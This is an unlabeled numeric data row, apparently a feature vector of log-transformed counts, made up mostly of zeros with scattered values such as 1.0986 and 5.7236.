0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.969640753475787, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 5.723585101952381, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.76977456331519, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 7.000208219919599, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 4.143134726391533, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 4.795790545596741, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.044522437723423, 0.0, 0, 0.0, 0.0, 0.0, 4.74493212836325, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 6.516193076042964, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 3.2958368660043296, 0.0, 3.58351893845611, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.51085950651685, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.952096120109145, 0.0, 5.58914919554, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0, 0, 0, 0.0, 1.3862943611198906, 3.258096538021482, 0, 0.0, 0.0, 0.0, 4.394449154672439, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 5.101797476893978, 0.0, 2.302585092994046, 0, 0, 0.0, 4.292158018817389, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0, 0.0, 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.9512437185814275, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 4.06534854782536, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.295836866004329, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0, 3.5553480614894135, 0.0, 0, 2.5649493574615367, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 5.46286043483228, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 